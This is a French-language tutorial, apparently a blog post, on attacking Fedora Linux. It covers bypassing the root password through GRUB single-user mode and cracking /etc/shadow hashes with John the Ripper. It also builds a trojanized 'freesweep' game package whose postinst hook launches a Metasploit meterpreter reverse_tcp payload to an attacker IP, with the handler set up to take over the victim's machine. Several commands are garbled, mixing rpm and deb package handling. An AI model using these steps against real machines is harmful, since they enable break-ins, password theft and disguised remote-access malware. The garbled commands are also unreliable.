Dans ce tutoriel nous allons illustrer comment attaquer le systeme Fedora

Fedora, anciennement Fedora Core, est une distribution GNU/Linux basée sur le système RPM, développée par le Projet Fedora et soutenue par la société Red Hat. Cette distribution se veut être un système d'exploitation complet et généraliste, composé uniquement de logiciels libres. Fedora dérive donc de la distribution Red Hat Linux, et est destinée à la remplacer pour les utilisateurs finaux (utilisation non commerciale).Le maintien de Fedora provient en grande partie de sa communauté d'utilisateurs. Bien que Red Hat emploie de nombreux pour Fedora, l'entreprise ne fournit pas d'assistance officielle pour les utilisateurs du grand public.Le rythme de sortie des nouvelles versions est basé sur celui de GNOME, c'est-à-dire 6 mois.


les attaque qu’on va présenter dans ce tuto sont:


- Accéder au système sans connaitre le mot passe ROOT.

- Cracker un mot de passe en utilisant l’outil John The Ripper.

- Ouvrez Shell distant.


La première attaque qu’on peut effectuer, c’est d’accéder au système de Fedora sans connaitre le mot de passe de ROOT, elle est très simple et n’importe qu’il peut effectuer cette attaque. Voici les procédures de l’attaque :


1- Démarrez votre ordinateur.

2-A l'invite de GRUB, choisissez la ligne concernant votre linux et appuyez sur la touche e (pour édition)

3-Sélectionnez la deuxième ligne (celle qui commence par kernel ...) avec les curseurs et appuyez de nouveau sur e pour également l'éditer

4-Allez à la fin de la ligne et rajoutez le mot single (cela fonctionne aussi avec la lettre s ou le chiffre 1 sur la plupart des distributions, à vous de choisir)

5-Appuyez sur la touche b afin de booter avec ces nouveaux paramètres

Le système va alors démarrer en mode single user et vous proposer une invite de commande en ROOT sans vous demander aucun mot de passe. A cette étape vous pouvez créer un nouvel utilisateur, ou bien même de changer le mot de passe de l’utilisateur ROOT.
On constate que cette attaque et très facile à le faire, et pour se prévenir de ce genre d’attaque il faut restreindre et surveiller l’accès a la machine.
Dans la deuxième, l’attaque qu’on présente dans ce tutoriel c’est comment cracker le mot de passe de ROOT, elle est simple aussi mais, généralement elle prend beaucoup de temps. Avant de d’entrer dans les détails de cette attaque nous allons expliquer comment Fedora gère et stocke les mots de passes. Fedor, en général linux, utilise deux fichier pour stocker les mots de passes et les autre informations concernant l’identité des utilisateurs. Ces fichier sont : / etc / passwd et / etc / shadow.
Le fichier /etc/passwd contient une entrée par ligne pour chaque utilisateur (ou compte utilisateur) du système. Tous les champs sont séparés par deux points (:) symbole.
Généralement, l'entrée passwd se présente comme suit :

1 : Nom d'utilisateur

2 : Mot de passe: Un caractère x indique que le mot de passe crypté est stocké dans / etc / shadow.

3- ID de l’utilisateur : chaque utilisateur a son propre id

4- Groupe ID : pour désigner à quel groupe l’utilisateur est attaché.

5-Infos ID utilisateur : des informations supplémentaires sur l’utilisateur.

6-répertoire d’accueil de l’utilisateur.

7-Commande / shell : il s’agit d’une coquille.

Donc on remarque que le mot de passe n’est pas stocké dans ce fichier. Il est juste indiqué le chemine d’accès au fichier /etc/shadow contenant le mot de passe. Ce dernier stocke mots de passe cryptés.

Les étape de cette deuxième attaque sont :

1-Booter sur un CD BACKTRAK

2- monter la partition ou se trouve les deux fichiers précédent.

3- lancer la commande suivante : unshadow /etc/passwd /etc/shadow > mypasswd.

4-puis lancer JOHN en utilisant la commande john mypasswd.

5- Une fois JOHN fini sont travaille vous pouvez visualiser le mot de passe en tapant cette la commande john --show mypasswd .

Dans les exemples précédent, les attaque ne peuvent pas être effectué à distant. Dans cette partie nous allons présenter une autre attaque qui consiste de se connecter à un Shell distant de prendre le contre de la machine victime.

Le principe général de cette attaque est d’installer un paquet DEBIAN dans une machine distante, en utilisant les outils de metasploit. Et dis que la machine victime accepte l’installation de paquet, l’attaquant se connecte au Shell de cette dernière. Pour réaliser cette attaque on procède comme suit :

1- Entrez le répertoire de metasploit : cd $HOME/msf3.

2- télécharger un paquet rmp de changement par exemple : freesweep

3- Nous créons le nouveau dossier va résider sur notre packet rmp : su mkdir evil

4- Déplacez le fichier précédemment téléchargé dans le répertoire que vous venez de créer, e nom du package peut changer selon la version ou moins :
mv /var/cache/apt/archives/freesweep_0.90-2_i386.rmp evil

5-Décompressez la rmp dans le travail : dpkg -x freesweep_0.90-2_i386.rmp work

6-Maintenant nous allons créer le fichier qui exécutera notre coquille mkdir work/DEBIAN cd work/DEB*

7-Créez le fichier contrôle su –s

8- ecrire dans le fichier les informations suivante : - echo "Package: freesweep" > control
-echo "Version: 0.90-2 " >> control
-echo "Section: Games and Amusement " >> control
-echo "Priority: optional " >> control
-echo "Architecture: i386 " >> control
-echo "Description: a text-based minesweeper" >> control
-echo " Freesweep is an implementation of the popular minesweeper game" >> control

Que finalement, il sera ainsi: root@cls:~/msf3/evil/work/DEBIAN# cat control
Package: freesweep
Version: 0.90-2
Section: Games and Amusement
Priority: optional
Architecture: i386
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game

9-Maintenant nous allons créer le fichier qui s'exécutera après l'installation ’, nommé:
Postinst: echo '#!/bin/sh' > postinst
echo "su chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &" >> postinst
Il sera donc après:
root@cls:~/msf3/evil/work/DEBIAN# cat postinst
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
10- et nous allons utiliser l’outil metasploit: cd $HOME/msf3

11- Nous utilisons l'utilitaire super de metasploit :

root@cls:~/msf3# su ./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.21 LPORT=4444 X > evil/work/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/meterpreter/reverse_tcp
Length: 50
Options: LHOST=192.168.1.21,LPORT=4444

11- cd work/DEB*
Prenons le o.o droite autorisations : chmod 755 postinst

12-Remplissez notre nouveau package
De retour à metasploit : cd $HOME/msf3
root@cls:~/msf3# dpkg-rmp --build evil/work
dpkg-deb: generazione del pacchetto "freesweep" in "evil/work.rmp".
root@cls:~/msf3#

12- Lancer metasploit -use multi/handler

-set payload linux/x86/meterpreter/reverse_tcp
-set LHOST IP
-exploit

13- Maintenant il faut l’utilisateur de la machine victime accepte l’installation de packet pour se connecter et prendre contrôle de ca machine.